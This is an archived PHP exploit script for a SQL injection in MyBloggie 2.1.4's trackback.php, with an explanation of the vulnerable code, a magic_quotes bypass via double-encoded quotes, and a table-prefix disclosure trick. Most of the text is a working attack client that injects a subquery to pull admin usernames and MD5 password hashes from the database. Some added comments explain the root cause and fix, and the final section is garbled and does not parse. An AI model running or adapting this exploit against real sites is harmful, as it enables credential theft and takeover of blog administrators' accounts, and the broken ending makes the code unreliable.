
MyBloggie <= 2.1.4 trackback.php SQL injection / admin credentials disclosure



#!/usr/bin/php -q -d short_open_tag=on=0D
rgod@autistici.org\n";=0D 
echo "site: http://retrogod.altervista.org\n\n";=0D 
=0D
/*
works regardless of php.ini settings
against MySQL >= 4.1 (allowing subqueries)
*/
=0D
// Fewer than two positional arguments (host and path): print the usage text and stop.
if ($argc < 3) {
    $self = $argv[0];
    $usage = [
        "Usage: php {$self} host path OPTIONS\n",
        "host:      target server (ip/hostname)\n",
        "path:      path to MyBloggie\n",
        "Options:\n",
        "   -i           specify an existent post id (default: 1)\n",
        "   -T[prefix]   specify a table prefix different from default (mb_)\n",
        "   -p[port]:    specify a port other than 80\n",
        "   -P[ip:port]: specify a proxy\n",
        "   -d:          disclose table prefix (reccomended)\n",
        "Example:\r\n",
        "php {$self} localhost /MyBloggie/ -d -i7\r\n",
        "php {$self} localhost /MyBloggie/ -Tm_\r\n",
    ];
    foreach ($usage as $line) {
        echo $line;
    }
    die;
}
=0D
/* software site: http://mybloggie.mywebland.com/

  vulnerable code in trackback.php:

...
if(!empty($_REQUEST['title'])) {
$title=urldecode(substr($_REQUEST['title'],0,$tb_title_len));
}
else { $tback->trackback_reply(1, "

Sorry, Trackback failed.. Reason : No title

"); }

if(!empty($_REQUEST['url'])) {
$url=urldecode($_REQUEST['url']);

if (validate_url($url)==false) { $tback->trackback_reply(1, "

Sorry, Trackback failed.. Reason : URL not valid

"); }
}
else { $tback->trackback_reply(1, "

Sorry, Trackback failed.. Reason : No URL

"); }

if(!empty($_REQUEST['excerpt']))
{
$excerpt=urldecode(substr($_REQUEST['excerpt'],0,$tb_excerpt_len));
} else {
$tback->trackback_reply(1, "

Sorry, Trackback failed.. Reason : No Excerpt

");
}

// The blog name
if(!empty($_REQUEST['blog_name']))
{
$blog_name=urldecode(substr($_REQUEST['blog_name'],0,$tb_blogname_len));
} else
{
$blog_name="No Blog Name";
}

$timestamp = mktime(gmtdate('H', time(), $timezone ),gmtdate('i', time(), $timezone ),
gmtdate('s', time(), $timezone ), gmtdate('n', time(), $timezone ),
gmtdate('d', time(), $timezone ), gmtdate('Y', time(), $timezone ));

$sql = "INSERT INTO ".COMMENT_TBL." SET post_id='$tb_id', comment_subject='$title', comments='$excerpt', com_tstamp='$timestamp' ,
poster = '$blog_name', home='$url', comment_type='trackback'";

$result = $db->sql_query($sql) or die("Cannot query the database.
" . mysql_error());
...

you have sql injection in 'title', 'url', 'excerpt' and 'blog_name' argument
with MySQL >= 4.1 that allows SELECT subqueries for INSERT...

so you can insert admin username & password hash inside comments and you will see them on screen
also arguments are passed to urldecode(), so you can bypass magic_quotes_gpc
with '%2527' sequence for the single quote char
and you can disclose table prefix going to:

http://192.168.1.3/mybloggie/index.php?mode=viewdate

you will have an error that discloses a query fragment

-

ex., injecting code in 'title' argument, query becomes:

INSERT INTO mb_comment SET post_id='1', comment_subject='hi',comments=(SELECT CONCAT('')FROM mb_user)/*', comments='whatever', com_tstamp='1154799697' ,
poster = 'whatever', home='http://www.suntzu.org', comment_type='trackback'
*/

// Root cause, from the excerpt above: the request values are concatenated straight
// into the INSERT, and urldecode() runs after magic_quotes_gpc has escaped the input,
// so a double-encoded quote reaches the query unescaped. The fix is to bind the
// values (prepared statements) or escape them after decoding, and to stop echoing
// raw MySQL error text to the client, which is what leaks the table prefix.

// Script-level runtime settings: hide notices/warnings, remove the execution
// time limit and cap each socket operation at 5 seconds.
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

// Debug helper: hex dump of $string. Returns two blocks separated by "\r\n":
// the bytes as space-separated two-digit hex, then the bytes as printable
// characters (values <= 32 or > 126 shown as "."), each wrapped every 15 bytes.
// Not called anywhere in this listing.
function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
// bitwise | on two booleans: same truth value as ||, both sides always evaluated
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
// left-pad single-digit hex values with "0"
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
// "ip:port" pattern for the -P option; the parentheses double as the PCRE delimiters.
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
// Sends one raw HTTP request ($packet) to $host:$port, or through the -P proxy,
// and leaves the complete raw response (headers included) in the global $html.
// Direct mode reads with fgets() until EOF; proxy mode reads one byte at a time
// and only stops once EOF has been reached *and* a CRLFCRLF has been seen in
// $html, so a response with no blank line never terminates that loop.
// Exits the script on connection failure or an invalid proxy string.
// eregi() belongs to the PHP 4/5 POSIX regex family, removed in PHP 7.
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." 
proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
#debug
#echo "\r\n".$html;
}

// True when the trimmed input starts with 32 lowercase hex characters (the
// shape of an MD5 digest); anchored only at the start. ereg() is PHP 4/5 only.
function is_hash($hash)
{
if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}
else {return false;}
}

// Positional arguments and option defaults.
$host=$argv[1];
$path=$argv[2];
$port=80;
$prefix="mb_";
$post_id="1";//admin
$proxy="";
$dt=0;

// Options are recognised by their first two characters; the flag text is then
// stripped off to obtain the value. A one-character argument reads an undefined
// string offset here, which error_reporting(0) hides.
for ($i=3; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
{
$port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
if ($temp=="-T")
{
$prefix=str_replace("-T","",$argv[$i]);
}
if ($temp=="-i")
{
$post_id=(int) str_replace("-i","",$argv[$i]);
echo "post id -> ".$post_id."\n";
}
if ($temp=="-d")
{
$dt=1;
}
}
// path must begin and end with '/' (<> is the same operator as !=)
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... 
check the path!'; die;}
// Through a proxy the request line needs the absolute URL.
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

// -d: fetch index.php?mode=viewdate and, if the page echoes a raw MySQL syntax
// error, read the table prefix out of the leaked query fragment (the text
// between "UNIXTIME(" and "posts.timest"). This disclosure exists only because
// database errors are displayed to the client; suppressing them removes it.
if ($dt)
{
$packet ="GET ".$p."index.php?mode=viewdate HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
if (strstr($html,"You have an error in your SQL syntax"))
{
$temp=explode("UNIXTIME(",$html);
$temp2=explode("posts.timest",$temp[1]);
$prefix=$temp2[0];
echo "table prefix -> ".$prefix."\n";
}
}

// The injected "title" value; "%2527" is the double-encoded quote described in
// the header comment.
$sql="%2527,comments=(SELECT CONCAT(%2527%2527)FROM ".$prefix."user)/*";
//some problems with argument length, maybe with prefix > 3 chars you will have some error, cut the '%2527)FROM ".$prefix."user)/*";
$data="title=hi".$sql;
$data.="&url=http%3a%2f%2fwww%2esuntzu%2eorg";
$data.="&excerpt=whatever";
$data.="&blog_name=whatever";
// Raw HTTP/1.0 POST to trackback.php; Content-Length is computed from $data.
$packet ="POST ".$p."trackback.php/$post_id HTTP/1.0\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
sleep(1);

// Fetch the post page and look for the injected values in the comment output.
$packet ="GET ".$p."index.php?mode=viewid&post_id=$post_id HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
//echo $html;
// NOTE(review): the archived listing is garbled from here (unbalanced quotes,
// and $i / $temp2 are used as if inside a loop that is not present). Left as
// found; this part does not parse as-is.
$temp=explode('"message">",$temp[$i]);
if (is_hash($temp2[0]))
{
$hash=$temp2[0];
$temp2=explode("-->",$temp[$i+1]);
$admin=$temp2[0];
echo "----------------------------------------------------------------\n";
echo "admin -> ".$admin."\n";
echo "password (md5) -> ".$hash."\n";
echo "----------------------------------------------------------------\n";
die();
}
}
//if you are here...
echo "exploit failed...";
?>

original url: http://retrogod.altervista.org/mybloggie_214_sql.html
